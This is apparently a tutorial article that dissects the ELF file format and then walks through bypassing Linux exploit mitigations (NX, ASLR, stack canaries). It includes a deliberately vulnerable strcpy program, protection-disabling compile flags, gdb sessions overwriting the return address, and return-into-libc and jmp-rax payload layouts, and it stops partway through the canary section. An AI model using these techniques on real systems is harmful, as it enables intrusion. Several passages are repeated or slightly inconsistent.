New systems make attackers life hard and common exploitation techniques get harder to reproduce. The purpose of this article is to be very general on mitigation techniques and to cover attacks on x32 as a reference to x64 architectures to stick with the new constraints of today.
Here, you will find the first step which is an ELF format file analysis. After that we will speak about the protections and ways to bypass them. To finish, we will introduce the x86_64 that makes things more difficult for nowadays exploitations.
Pre-requisites:
- Basics in Linux, asm x86,
- a good understanding of buffer overflows, format string exploitations, heap overflows,
- 0x00900dc0ff33,
- Ubuntu 11.04 on x86_64.
- a default song…: Zeads dead – Paradise Circus (Massive attack Remix)
Here is the contents:
- The ELF format
- A standard
- Where is it used?
- ELF Layout
- Dissecting the ELF
- The “magic” field
- Reversing ELF’s header
- Sections
- Relocations
- Program Headers
- Exploitations
- Old is always better (for attackers)
- Nonexecutable stack
- Address Space Layout Randomization
- Brute-force
- Return-to-registers
- Stack Canary
- RELRO
- The x86_64 fact and current systems hardening
- References & Acknowledgements
The ELF format
A standard
Replacing the COFF and “a.out” formats that Linux previously used, ELF (Executable and Linking Format) increased flexibility. Indeed, when shared libraries are difficult to create and dynamically loading a shared library is cumbersome with “a.out” format, the ELF format has come with these two benefits[1]:
- It is much simpler to make shared libraries,
- It make dynamic loading and has comes with other suggestions for dynamic loading have included super-fast MUDs (Multi-User Domains also known as “Multi-User Dungeon”), where extra code could be compiled and linked into the running executable without having to stop and restart the program.
This format has been selected by the Tool Interface Standards committee (TIS) as a standard for portable object files for a variety of (Unix-Like) operating systems.
Where is it used?
Actually ELFs cover object files (.o), shared libraries (.so) and is also used for loadable kernel modules. As follows in listing 1, you can see also which systems[4] have adopted the ELF format:
Listing 1. Applications of ELF format
ELF Layout
An ELF as at least two headers: the ELF header (Elf32_Ehdr/Elf64_Ehdr struct) and the program header (Elf32_Phdr/struct Elf64_Phdr struct)[5]. But there is also a header which is called the “section header” (Elf32_Shdr/struct Elf64_Shdr struct) and which describes section like: .text, .data, .bss and so on (we will describe them later).
Figure 1. ELF Layout – execution view linking view
(source: ELF Format specifications[2])
As you can see in figure 1, there is two views. Indeed, the linking view is partitioned by sections and is used when program or library is linked. The sections contain some object files informations like: datas, instructions, relocation informations, symbols, debugging informations, and so on.
From the other part, the execution view, which is partitioned by segments, is used during a program execution. The program header as shown in the left, contains informations for the kernel on how to start the program, will walk through segments and load them into memory (mmap).
Dissecting the ELF
The “magic” field
In Linux forensic, it is common to use the “file” command to the type of a particular file, as follows:
/bin/ls: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped
Now lets focus on the “ELF” string. As you had probably noticed using “hexdump” on any ELF file (like /bin/ls for example), the file starts with 0x7f then there are three next bytes for the encoded string “ELF”:
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
The first 16 bytes represent the elf “magic” field, which is a way to identify an ELF file. But if bytes 1, 2 and 3 represent the encoded string “ELF”, what represent bytes 4, 5, 6, 7, 8, 9?
Just have a look at “elf.h” source code:
#define ELFCLASSNONE 0 /* Invalid class */
#define ELFCLASS32 1 /* 32-bit objects */
#define ELFCLASS64 2 /* 64-bit objects */
#define ELFCLASSNUM 3
#define EI_DATA 5 /* Data encoding byte index */
#define ELFDATANONE 0 /* Invalid data encoding */
#define ELFDATA2LSB 1 /* 2's complement, little endian */
#define ELFDATA2MSB 2 /* 2's complement, big endian */
#define ELFDATANUM 3
#define EI_VERSION 6 /* File version byte index */
/* Value must be EV_CURRENT */
#define EI_OSABI 7 /* OS ABI identification */
#define ELFOSABI_NONE 0 /* UNIX System V ABI */
#define ELFOSABI_SYSV 0 /* Alias. */
#define ELFOSABI_HPUX 1 /* HP-UX */
#define ELFOSABI_NETBSD 2 /* NetBSD. */
#define ELFOSABI_LINUX 3 /* Linux. */
#define ELFOSABI_SOLARIS 6 /* Sun Solaris. */
#define ELFOSABI_AIX 7 /* IBM AIX. */
#define ELFOSABI_IRIX 8 /* SGI Irix. */
#define ELFOSABI_FREEBSD 9 /* FreeBSD. */
#define ELFOSABI_TRU64 10 /* Compaq TRU64 UNIX. */
#define ELFOSABI_MODESTO 11 /* Novell Modesto. */
#define ELFOSABI_OPENBSD 12 /* OpenBSD. */
#define ELFOSABI_ARM_AEABI 64 /* ARM EABI */
#define ELFOSABI_ARM 97 /* ARM */
#define ELFOSABI_STANDALONE 255 /* Standalone (embedded) application */
#define EI_ABIVERSION 8 /* ABI version */
#define EI_PAD 9 /* Byte index of padding bytes */
We can affirmatively say, that our file is an ELF of class 64, encoded in little endian with a UNIX System V ABI standard and has 0 padding bytes. By the way, if you did not expected yet, we have compared to the structure we have observed here the “e_ident” of “Elf64_Ehdr” structure.
Reversing ELF’s header
To begin the complete dissection, let’s just start making a simple binary file as follows:
And produce an ELF before linking it:
We will use now one of the most used tool as “objdump” to analysis ELF files which is readelf from binutils to display every fields. That will simplify our analysis but if you are interested for dissecting ELF files yourself, you can look for libelf and we will also talk about some interesting libraries in Python to do it much more quickly.
Now, we observe the ELF header:
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: REL (Relocatable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x0
Start of program headers: 0 (bytes into file)
Start of section headers: 312 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 0 (bytes)
Number of program headers: 0
Size of section headers: 64 (bytes)
Number of section headers: 13
Section header string table index: 10
The result seems to be very implicit, but now just let’s try to identify these field using our lovely hexdump tool (in “warrior forensic style!” or not):
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 01 00 3e 00 01 00 00 00 00 00 00 00 00 00 00 00 |..>.............|
00000020 00 00 00 00 00 00 00 00 38 01 00 00 00 00 00 00 |........8.......|
00000030 00 00 00 00 40 00 00 00 00 00 40 00 0d 00 0a 00 |....@.....@.....|
00000040
We already know the first line, but what can say about the three others? As you can see, in the second line, the first two bytes represent the “e_type”. Indeed, if you look at “elf.h” file, you could observe that “01 00” in little-Indian, means: “Relocatable file”.
Now look at the two next bytes. We have “3e 00” that is equivalent to 62 in decimal (3*16¹ + c = 62), which defines the AMD x86-64 architecture:
After we have the “e_version” field with “01 00” as a value for “Current version”:
#define EV_NONE 0 /* Invalid ELF version */
#define EV_CURRENT 1 /* Current version */
#define EV_NUM 2
Bytes 24 to 26 indicate the entry point address (which is 0x0 while it is not linked) . And we finish with two more most important think that we will talk about in this article :
- Program Headers with 6 headers, starting at byte 64 (byte 32 and 33 in hexdump),
- section headers with 29 headers, starting at byte (byte 40 – 43 in hexdump).
For the rest, we will use readelf and I will let you finish the header part by yourself.
Sections
Let’s just see “toto.o” sections with the following command:
There are 13 section headers, starting at offset 0x138:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .text PROGBITS 0000000000000000 00000040
0000000000000018 0000000000000000 AX 0 0 4
[ 2] .rela.text RELA 0000000000000000 00000598
0000000000000030 0000000000000018 11 1 8
[ 3] .data PROGBITS 0000000000000000 00000058
0000000000000000 0000000000000000 WA 0 0 4
[ 4] .bss NOBITS 0000000000000000 00000058
0000000000000000 0000000000000000 WA 0 0 4
[ 5] .rodata PROGBITS 0000000000000000 00000058
0000000000000010 0000000000000000 A 0 0 1
[ 6] .comment PROGBITS 0000000000000000 00000068
000000000000002b 0000000000000001 MS 0 0 1
[ 7] .note.GNU-stack PROGBITS 0000000000000000 00000093
0000000000000000 0000000000000000 0 0 1
[ 8] .eh_frame PROGBITS 0000000000000000 00000098
0000000000000038 0000000000000000 A 0 0 8
[ 9] .rela.eh_frame RELA 0000000000000000 000005c8
0000000000000018 0000000000000018 11 8 8
[10] .shstrtab STRTAB 0000000000000000 000000d0
0000000000000061 0000000000000000 0 0 1
[11] .symtab SYMTAB 0000000000000000 00000478
0000000000000108 0000000000000018 12 9 8
[12] .strtab STRTAB 0000000000000000 00000580
0000000000000014 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
As you can see, there is a lot of sections which are part of the ELF64_Shdr:
- Code sections (.text),
- data section (.data, .bss, .rodata),
- the .comment which is used to store extra informations,
- relocation tables (.rela.*),
- symbol tables (.symtab),
- section String Tables (.shstrtab) which stores the name of each section,
- string tables (.strtab).
The address column normally shows where sections should be loaded into virtual memory, but this was not filled in for each section. The reason is that we did not linked it yet, so we will do that:
fluxiux@nyannyan:~$ readelf -S toto
There are 30 section headers, starting at offset 0x1178:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .interp PROGBITS 0000000000400238 00000238
000000000000001c 0000000000000000 A 0 0 1
[ 2] .note.ABI-tag NOTE 0000000000400254 00000254
0000000000000020 0000000000000000 A 0 0 4
[ 3] .note.gnu.build-i NOTE 0000000000400274 00000274
0000000000000024 0000000000000000 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0000000000400298 00000298
000000000000001c 0000000000000000 A 5 0 8
[ 5] .dynsym DYNSYM 00000000004002b8 000002b8
0000000000000060 0000000000000018 A 6 1 8
[ 6] .dynstr STRTAB 0000000000400318 00000318
000000000000003f 0000000000000000 A 0 0 1
[ 7] .gnu.version VERSYM 0000000000400358 00000358
0000000000000008 0000000000000002 A 5 0 2
[ 8] .gnu.version_r VERNEED 0000000000400360 00000360
0000000000000020 0000000000000000 A 6 1 8
[ 9] .rela.dyn RELA 0000000000400380 00000380
0000000000000018 0000000000000018 A 5 0 8
[10] .rela.plt RELA 0000000000400398 00000398
0000000000000030 0000000000000018 A 5 12 8
[11] .init PROGBITS 00000000004003c8 000003c8
0000000000000018 0000000000000000 AX 0 0 4
[12] .plt PROGBITS 00000000004003e0 000003e0
0000000000000030 0000000000000010 AX 0 0 4
[13] .text PROGBITS 0000000000400410 00000410
00000000000001d8 0000000000000000 AX 0 0 16
[14] .fini PROGBITS 00000000004005e8 000005e8
000000000000000e 0000000000000000 AX 0 0 4
[15] .rodata PROGBITS 00000000004005f8 000005f8
0000000000000014 0000000000000000 A 0 0 4
[16] .eh_frame_hdr PROGBITS 000000000040060c 0000060c
0000000000000024 0000000000000000 A 0 0 4
[17] .eh_frame PROGBITS 0000000000400630 00000630
000000000000007c 0000000000000000 A 0 0 8
[18] .ctors PROGBITS 0000000000600e28 00000e28
0000000000000010 0000000000000000 WA 0 0 8
[19] .dtors PROGBITS 0000000000600e38 00000e38
0000000000000010 0000000000000000 WA 0 0 8
[20] .jcr PROGBITS 0000000000600e48 00000e48
0000000000000008 0000000000000000 WA 0 0 8
[21] .dynamic DYNAMIC 0000000000600e50 00000e50
0000000000000190 0000000000000010 WA 6 0 8
[22] .got PROGBITS 0000000000600fe0 00000fe0
0000000000000008 0000000000000008 WA 0 0 8
[23] .got.plt PROGBITS 0000000000600fe8 00000fe8
0000000000000028 0000000000000008 WA 0 0 8
[24] .data PROGBITS 0000000000601010 00001010
0000000000000010 0000000000000000 WA 0 0 8
[25] .bss NOBITS 0000000000601020 00001020
0000000000000010 0000000000000000 WA 0 0 8
[26] .comment PROGBITS 0000000000000000 00001020
0000000000000054 0000000000000001 MS 0 0 1
[27] .shstrtab STRTAB 0000000000000000 00001074
00000000000000fe 0000000000000000 0 0 1
[28] .symtab SYMTAB 0000000000000000 000018f8
0000000000000600 0000000000000018 29 46 8
[29] .strtab STRTAB 0000000000000000 00001ef8
00000000000001f2 0000000000000000 0 0 1
Wow! Some new sections appeared:
- .interp which holds pathname of the program interpreter,
- code sections (.plt, .init, .fini),
- table of imported/exported symbols (.dynsym),
- dynamic names table (.dynstr),
- dynamic hash table (.hash),
- new relocation tables (.rela.*),
- constructor and Destructor tables (.ctors, .dtors),
- section reserved for dynamic binaries (.got, .dynamic, .plt).
After the address column, you have the offset within the file of the section, then you have the size in byte of each section, the section header size in byte, the required alignment, the Flags (Read, Write, Execute), and so on.
In this article, we will discover some important sections to target for any attack.
Relocations
The relocation is made to modify the memory image of mapped segments to make them executable. As you saw before, there are some “.rela.*” sections which are used to show where to patch the memory and how. Let’s look the different relocations using our favorite tool “readelf”:
Relocation section '.rela.dyn' at offset 0x380 contains 1 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000600fe0 000200000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
Relocation section '.rela.plt' at offset 0x398 contains 2 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000601000 000100000007 R_X86_64_JUMP_SLO 0000000000000000 printf + 0
000000601008 000300000007 R_X86_64_JUMP_SLO 0000000000000000 __libc_start_main + 0
For example, it means for “printf” we need to patch the offset 0x000000600fe0 from the beginning of the .plt section.
For more informations, you have also a description of relocation types in “elf.h”:
#define R_X86_64_NONE 0 /* No reloc */
[...]
#define R_X86_64_GLOB_DAT 6 /* Create GOT entry */
#define R_X86_64_JUMP_SLOT 7 /* Create PLT entry */
[...]
Program Headers
The section header table is not loaded into memory, because the kernel nor the dynamic loader will be able to use that table. To load a file into memory, program headers are used to provide informatios that are required:
Elf file type is EXEC (Executable file)
Entry point 0x400410
There are 9 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000040 0x0000000000400040 0x0000000000400040 0x0001f8 0x0001f8 R E 0x8
INTERP 0x000238 0x0000000000400238 0x0000000000400238 0x00001c 0x00001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x0006ac 0x0006ac R E 0x200000
LOAD 0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001f8 0x000208 RW 0x200000
DYNAMIC 0x000e50 0x0000000000600e50 0x0000000000600e50 0x000190 0x000190 RW 0x8
NOTE 0x000254 0x0000000000400254 0x0000000000400254 0x000044 0x000044 R 0x4
GNU_EH_FRAME 0x00060c 0x000000000040060c 0x000000000040060c 0x000024 0x000024 R 0x4
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x8
GNU_RELRO 0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001d8 0x0001d8 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag .note.gnu.build-id
06 .eh_frame_hdr
07
08 .ctors .dtors .jcr .dynamic .got
As you can see, each program header corresponds to one segment where you can find sections into it. But how does it work?
In the beginning, when the kernel sees the INTERP segment, it loads first the LOAD segments to the specified virtual addresses, then load segments from program interpreter (/lib64/ld-linux-x86-64.so.2) and jumps to interpreter’s entry point. After that, the loader gets the control and loads libraries specified in LD_PRELOAD and also DYNAMIC segments of the executable that are needed:
Dynamic section at offset 0xe50 contains 20 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
After relocations, the loader invokes all libraries INIT function and then jumps to executable’s entry point.
In static, there is less thinks to say because the kernel only loads LOAD segments to the virtual addresses and then jumps to the entry points (easy eh?).
For some more details (I think), you can see an old but very good article published in Linux Journal #13 about ELF dissection by Eric Youngdale[6].
Exploitation
Old is always better (for attackers)
Once upon a the time, you where at home and waiting for the rain to stop. As always you “googled” for some interesting informations (of course!) and you found a kind of bible: Smashing the stack for fun and Profit[7].
Identifying the stack address, putting your shellcode at the beginning, adding some padding and rewriting the EIP, you could see that we can execute anything we want while exploiting a stack overflow. But times have changed, and you’re now confronted to canaris, ASLR (Address Space Layout Randomization), no executable stack, RELRO (read-only relocations), PIE support, binary-to-text encoding, and so on.
Nonexecutable stack
To make the stack nonexecutable, we use the bit NX (No eXecute for AMD) or bit XD (eXecute Disable for Intel). In figure 2, you could see that it matches with the most significant bit of a 64-bit Page Table Entry:
Figure 2 – 64-bit Page Table Entry
(Source : A hardware-enforced BOF protection )
So trying to exploit a stack based overflow, you should be surprised by the fact your shellcode doesn’t produce what you expected, and that’s the power of the bit NX (NX = 0 → Execute, NX = 1 → No eXecute).
Using “readlef -l ” you can see if the stack is executable or not :
0x0000000000000000 0x0000000000000000 RW 8
As you can see, the only flags we got is the Read and Write ones. You can disable the eXecute flag using “execstack -s [binaryfile]” and see the difference (RWE).
To bypass it, we can use a method called “Return-into-libc”. Endeed, we know that any program that includes libc will have access to its shared functions (such as printf, exit, and so on), and we can execute “system(“/bin/sh”)” to get a shell.
First, we fill the vulnerable buffer with some junk data up to EIP (“AAAAAAAAAHH…”! is great). After that, we have to find “system()” function, but if we want to exit the program properly, the “exit()” will be also needed (using gdb):
Starting program: /home/fluxius/toto main
huhu la charrue
Program exited with code 017.
(gdb) p system
$1 = {<text variable, no debug info>} 0x7ffff6b8a134 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x7ffff6b81890 <exit>
Then, we overwrite the return address with system() function’s address and follow it with the exit() function’s address. To finish, we put the address of “/bin/sh” (that you can retrieve from a memcmp() or an environment variable).
Inject = [junk][system()][exit()][”/bin/sh”]
Note: NX bit is only available in Physical Address Extension (PAE), but can be emulated by PaX or ExecShield.
Moreover, we will see after on x86_64 platforms that “return-into-libc” doesn’t work because of the ABI specifications[8], and that’s probably a problem you’ve already encountered.
Address Space Layout Randomization
To avoid attackers to execute a dangerous shellcode, people has created a concept named “ASLR” (Address Space Layout Randomization). Indeed, it is a technique to arrange the position of the stack, heap, text, vdso, shared libraries and the base address of the executable (when builded with Position-independent executable support). So if you try to execute any shellcode at a saved position, you’ll observe a little fail, because the shellcode isn’t executed (or you are very lucky) and you get the classic error for segmentation faults as we did not ended properly.
When performing a stack overflow for example, you could disable ASLR changing the current level to “0”:
Or there is another trick (proposed by “perror), that does not require “root” privileges, using “setarch” to change reported architecture in a new program environnement and setting personality flags:
But it’s not quite fun, is it? So, attackers have found some ways to bypass this kind of technique. Indeed, in older kernels, they saw the ESP points to the stack, and of course, the buffer is on the stack too. A technique using linux-gate’s instructions, that were static before the kernel 2.6.18, was used to retrieve the address of any interesting pattern “\xff\xe4” (“jump esp” on x86) in memory. Other techniques to bypass ASLR exist like Brute-force.
Brute-force
Thinking about exec() family functions, we can use “execl” to replace the current process image with a new process image. Let’s make a simple code to observe the randomization:
If ASLR is enabled, you should see something like this:
Buffer address : 0x7fff5e149710
fluxiux@handgrep :~ /aslr$ . /buffer_addr
Buffer address : 0x7fff71f6f0b0
fluxiux@handgrep :~ /aslr$ . /buffer_addr
Buffer address : 0x7fff763299c0
We see that 4 bytes change for each execution, and we have to be very lucky to point in our shellcode, if we try the brute-force way. So we will use “execl” now to see any weakness when the memory layout is randomized for the process:
{
int stack ;
printf ( "Stack address: %p\n" , &stack ) ;
execl ( "./buffer_addr" , "buffer_addr" , NULL ) ;
}
Compare the memory layouts with different runs of “buffer_addr”:
Buffer address: 0x7fffc5cfa180
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff1964d1f0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffba20bd30
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fffc8505ed0
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7ffff39cbc10
fluxiux@handgrep:~/aslr$ ./buffer_addr
Buffer address: 0x7fff6eb3aa90
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc5cfa180 - 0x7fff1964d1f0"
$1 = 2892681104
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffc8505ed0 - 0x7fffba20bd30"
$1 = 238002592
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffff39cbc10 - 0x7fff6eb3aa90"
$1 = 2229866880
And now with “execl” function:
Stack address: 0x7fff526d959c
Buffer address: 0x7fff2e95efd0
fluxiux@handgrep:~/aslr$ gdb -q --batch -ex "p 0x7fffaffcde50 - 0x7fff54800abc"
$1 = 1534907284
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffdaf7d5fc - 0x7fff08361da0"
$1 = 3535911004 If we dig a little bit more, we can reduce the domain of probabilistic addresses using “/proc/self/maps” files (local bypass), as shown below:
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7ffffbe8326c
Buffer address: 0x7fff792120c0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7ffffbe8326c - 0x7fff792120c0"
$1 = 2194084268
fluxiux@handgrep:~/aslr$ ./weakaslr
Stack address: 0x7fffed12acfc
Buffer address: 0x7fffa3a4f8f0
fluxiux@handgrep:~$ gdb -q --batch -ex "p 0x7fffed12acfc - 0x7fffa3a4f8f0"
$1 = 1231926284
Using this method, we could fill the buffer with return address, add a large NOP sled after the return address + the shellcode and guess any correct offset, to point to it. As you can see, the degree of randomization is not the same, but you can play with that. Of course, this attack is more effective on 32-bits and on older kernel versions[9].
If we dig a little bit more, we can reduce the domain of probabilistic addresses using “/proc/self/maps” files (local bypass), as shown below:
00fa8000-00fc9000 rw-p 00000000 00:00 0 [heap]
7ffd77890000-7ffd77a1a000 r-xp 00000000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77a1a000-7ffd77c19000 ---p 0018a000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77c19000-7ffd77c1d000 r--p 00189000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77c1d000-7ffd77c1e000 rw-p 0018d000 08:05 396967 /lib/x86_64-linux-gnu/libc-2.13.so
7ffd77c1e000-7ffd77c24000 rw-p 00000000 00:00 0
7ffd77c24000-7ffd77c26000 r-xp 00000000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77c26000-7ffd77e25000 ---p 00002000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77e25000-7ffd77e26000 r--p 00001000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77e26000-7ffd77e27000 rw-p 00002000 08:05 397045 /lib/x86_64-linux-gnu/libutil-2.13.so
7ffd77e27000-7ffd77e48000 r-xp 00000000 08:05 396954 /lib/x86_64-linux-gnu/ld-2.13.so
7ffd7801d000-7ffd78020000 rw-p 00000000 00:00 0
7ffd78043000-7ffd78044000 rw-p 00000000 00:00 0
7ffd78045000-7ffd78047000 rw-p 00000000 00:00 0
7ffd78047000-7ffd78048000 r--p 00020000 08:05 396954 /lib/x86_64-linux-gnu/ld-2.13.so
7ffd78048000-7ffd7804a000 rw-p 00021000 08:05 396954 /lib/x86_64-linux-gnu/ld-2.13.so
7fff7d479000-7fff7d49a000 rw-p 00000000 00:00 0 [stack]
7fff7d589000-7fff7d58a000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Unfortunately, this leak is partially patched since 2.6.27 according to Julien Tinnes and Tavis Ormandy[10], and these files seem to be protected if you cannot ptrace a pid. Anyway, there was any other way using “/proc/self/stat” and “/proc/self/wchan” that leak informations such as stack pointer and instruction pointer (=>ps -eo pid,eip,esp,wchan), and by sampling “kstkeip”, we could reconstruct the maps (see fuzzyaslr by Tavis Ormandy[11]).
Brute-forcing is always a very offensive way to get what you want, it takes time, and you should know that every tries recorded in logs. The solution is maybe in registers.
Return-to-registers
Using a debugger like GDB, can help you to find other ways to bypass some protections like DEP as shown previously and ASLR of course. To study this case, we will work with a better example:
#include <string.h>
vuln ( char * string )
{
char buffer [ 50 ] ;
strcpy (buffer , string ) ; // Guys! It's vulnerable!
}
main ( int argc , char ** argv )
{
if (argc > 1 )
vuln (argv [ 1 ] ) ;
}
By the way, don’t forget to disable the stack protector (compile as follows: gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=4 vuln2.c -o vuln2). Will see after what a canary is, but now, just let’s focus on ASLR for the moment.
With few tries, we see that we can rewrite the instruction pointer:
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/fluxiux/aslr/vuln2 `python -c 'print "A"*78'`
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
Put now a break to the “vuln()” function’s call and the return address:
Dump of assembler code for function main:
0x0000000000400515 <+0>: push %rbp
0x0000000000400516 <+1>: mov %rsp,%rbp
0x0000000000400519 <+4>: sub $0x10,%rsp
0x000000000040051d <+8>: mov %edi,-0x4(%rbp)
0x0000000000400520 <+11>: mov %rsi,-0x10(%rbp)
0x0000000000400524 <+15>: cmpl $0x1,-0x4(%rbp)
0x0000000000400528 <+19>: jle 0x40053d <main+40>
0x000000000040052a <+21>: mov -0x10(%rbp),%rax
0x000000000040052e <+25>: add $0x8,%rax
0x0000000000400532 <+29>: mov (%rax),%rax
0x0000000000400535 <+32>: mov %rax,%rdi
0x0000000000400538 <+35>: callq 0x4004f4 <vuln>
0x000000000040053d <+40>: leaveq
0x000000000040053e <+41>: retq (gdb) break *0x000000000040053e
Breakpoint 2 at 0x40053e
End of assembler dump.
(gdb) break *0x400538
Breakpoint 1 at 0x400538
(gdb) break *0x000000000040053e
Breakpoint 2 at 0x40053e
After that, put a break on the return address of the “vuln()” function:
Dump of assembler code for function vuln:
0x00000000004004f4 <+0>: push %rbp
0x00000000004004f5 <+1>: mov %rsp,%rbp
0x00000000004004f8 <+4>: sub $0x50,%rsp
0x00000000004004fc <+8>: mov %rdi,-0x48(%rbp)
0x0000000000400500 <+12>: mov -0x48(%rbp),%rdx
0x0000000000400504 <+16>: lea -0x40(%rbp),%rax
0x0000000000400508 <+20>: mov %rdx,%rsi
0x000000000040050b <+23>: mov %rax,%rdi
0x000000000040050e <+26>: callq 0x400400 <strcpy@plt>
0x0000000000400513 <+31>: leaveq
0x0000000000400514 <+32>: retq
End of assembler dump.
(gdb) break *0x0000000000400514
Breakpoint 3 at 0x400514
As we can see, the RSP contains the return address:
rsp 0x7fffffffe148 0x7fffffffe148
(gdb) x/20x $rsp - 40
[...]
0x7fffffffe140: 0x00000000 0x00000000 0x0040053d 0x00000000
[…]
The return address as been overwritten (we also noticed that previously):
rsp 0x7fffffffe148 0x7fffffffe148
(gdb) x/20x $rsp - 40
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0x41414141 0x00004141
0x7fffffffe150: 0xffffe248 0x00007fff 0x00000000 0x00000002
0x7fffffffe160: 0x00000000 0x00000000 0xf7a66eff 0x00007fff
And running at the last breakpoint, we can observe that register RAX points to the beginning of our buffer:
0x00000000004004f8 in vuln ()
(gdb) info reg rax
rax 0x7fffffffe520 140737488348448
(gdb) x/20x $rax - 40
0x7fffffffe4f8: 0x36387816 0x0034365f 0x00000000 0x2f000000
0x7fffffffe508: 0x656d6f68 0x756c662f 0x78756978 0x6c73612f
0x7fffffffe518: 0x75762f72 0x00326e6c 0x41414141 0x41414141
0x7fffffffe528: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe538: 0x41414141 0x41414141 0x41414141 0x41414141
(Note that if you’re not sure, try with this payload: `python -c ‘print “A”*70+”B”*8’`).
After that, we look for a valid “jmp/callq rax”:
4003cc: e8 6b 00 00 00 callq 40043c <call_gmon_start>
[...]
400604: ff d0 callq *%rax
..
At “0x400604” could be great, we just have to replace the junk data (“A”) by NOP sled and a precious shellcode that fits on the buffer and we replace the instruction pointer by the address “0x400604”. On 32-bits, “Sickness” has written a good article about that if you are interested[12].
But as you know, by default on Linux (especially the user friendly one: Ubuntu), programs are compiled with the bit NX support, so be lucky to use this technique on nowadays systems. Indeed, we use also an option to disable the stack protector, but what is it exactly?
Stack Canary
Named for their analogy to a canary in a coal mine, stack canary are used to protect against stack overflow attacks. Compiling with the stack protector option (which is used by default), each dangerous function is changed in his prologue and epilogue.
If we compile the previous code letting stack protector to be used, we get something like that:
fluxiux@handgrep:~/spp$ ./vuln3
fluxiux@handgrep:~/spp$ ./vuln3 `python -c 'print "A"*76'`
*** stack smashing detected ***: ./vuln3 terminated
Disassembling the “vuln()” function, we can see in the epilogue that a comparison is done:
Dump of assembler code for function vuln:
[...]
0x000000000040058d <+41>: callq 0x400470 <strcpy@plt>
0x0000000000400592 <+46>: mov -0x8(%rbp),%rdx
0x0000000000400596 <+50>: xor %fs:0x28,%rdx
0x000000000040059f <+59>: je 0x4005a6 <vuln+66>
0x00000000004005a1 <+61>: callq 0x400460 <__stack_chk_fail@plt>
0x00000000004005a6 <+66>: leaveq
[...]
If the value in “fs:0x28” is the same as in ”%rdx”, the “vuln()” function will end properly. In other case, the function “__stack_chk_fail()” will be called and an error message shows up (“*** stack smashing detected ***: ./vuln3 terminated ”).
Putting a break on “__stack_chk_fail()” function, we can observe the values on $RSP:
Starting program: /home/fluxiux/aslr/vuln3 `python -c 'print "A"*57'`
Breakpoint 1, 0x00000000004005cb in main ()
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004005a1 in vuln ()
(gdb) x/30x $rsp
0x7fffffffe100: 0x00000000 0x00000000 0xffffe535 0x00007fff
0x7fffffffe110: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
